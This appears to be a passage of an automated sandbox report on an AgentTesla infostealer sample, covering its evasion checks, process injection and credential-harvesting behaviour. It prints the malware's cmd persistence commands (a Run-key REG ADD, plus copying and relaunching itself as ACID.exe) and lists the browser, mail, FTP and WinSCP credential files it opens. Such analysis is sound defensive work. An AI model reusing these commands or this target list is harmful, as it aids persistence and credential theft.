                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -98890s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6040Thread sleep time: -98781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exe TID: 2588Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                    Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\ACID.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\image.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\image.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599327Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599165Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99797Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99467Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99225Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98781Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: InstallUtil.exe, 00000010.00000002.3445933830.00000000030B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: image.exe, 00000000.00000002.2390999485.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, image.exe, 00000000.00000002.2396428280.0000000006F40000.00000004.08000000.00040000.00000000.sdmp, image.exe, 00000000.00000002.2390999485.0000000005D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                    Source: InstallUtil.exe, 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: watchdog.exe, 00000012.00000002.3433742063.00000000006E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                    Source: InstallUtil.exe, 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: InstallUtil.exe, 00000010.00000002.3462947858.00000000064B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
                    Source: image.exe, 00000000.00000002.2390999485.0000000005D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 806010189GSOFTWARE\VMware, Inc.\VMware VGAuth
                    Source: C:\Users\user\Desktop\image.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_05127568 CheckRemoteDebuggerPresent,0_2_05127568
                    Source: C:\Users\user\Desktop\image.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\image.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\ACID.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Roaming\ACID.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: E56008Jump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 28 > nul && copy "C:\Users\user\Desktop\image.exe" "C:\Users\user\AppData\Roaming\ACID.exe" && ping 127.0.0.1 -n 28 > nul && "C:\Users\user\AppData\Roaming\ACID.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 28Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 28Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ACID.exe "C:\Users\user\AppData\Roaming\ACID.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess created: C:\Users\user\AppData\Local\Temp\watchdog.exe "C:\Users\user\AppData\Local\Temp\watchdog.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeProcess created: C:\Users\user\AppData\Local\Temp\watchdog.exe "C:\Users\user\AppData\Local\Temp\watchdog.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\image.exeQueries volume information: C:\Users\user\Desktop\image.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\image.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\image.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\image.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\image.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\image.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeQueries volume information: C:\Users\user\AppData\Roaming\ACID.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeQueries volume information: C:\Users\user\AppData\Local\Temp\watchdog.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeQueries volume information: C:\Users\user\AppData\Local\Temp\watchdog.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\image.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.image.exe.3c8a281.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.615681a.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.61435a9.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.615681a.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.6243d59.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3e03900.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.6256fb8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c47d02.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3e03900.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c9d502.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.62017da.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.6256fb8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.410d662.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.410d662.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.62017da.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c9d502.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c47d02.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3445933830.00000000030DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3445933830.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: image.exe PID: 5024, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ACID.exe PID: 6900, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1112, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 0.2.image.exe.3c8a281.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.615681a.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.61435a9.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.615681a.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.6243d59.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3e03900.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.6256fb8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c47d02.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3e03900.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c9d502.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.62017da.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.6256fb8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.410d662.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.410d662.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.62017da.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c9d502.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c47d02.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3445933830.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: image.exe PID: 5024, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ACID.exe PID: 6900, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1112, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.image.exe.3c8a281.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.615681a.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.61435a9.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.615681a.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.6243d59.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3e03900.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.6256fb8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c47d02.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3e03900.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c9d502.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.62017da.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.6256fb8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.410d662.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.410d662.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.62017da.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c9d502.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c47d02.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3445933830.00000000030DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3445933830.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: image.exe PID: 5024, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ACID.exe PID: 6900, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1112, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts                    		231
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Valid Accounts                    		1
                    Valid Accounts                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Input Capture                    		34
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt11
                    Registry Run Keys / Startup Folder                    		1
                    Access Token Manipulation                    		2
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		631
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook211
                    Process Injection                    		1
                    Timestomp                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model1
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		LSA Secrets361
                    Virtualization/Sandbox Evasion                    		SSHKeylogging23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Valid Accounts                    		DCSync1
                    Remote System Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Modify Registry                    		Proc Filesystem11
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
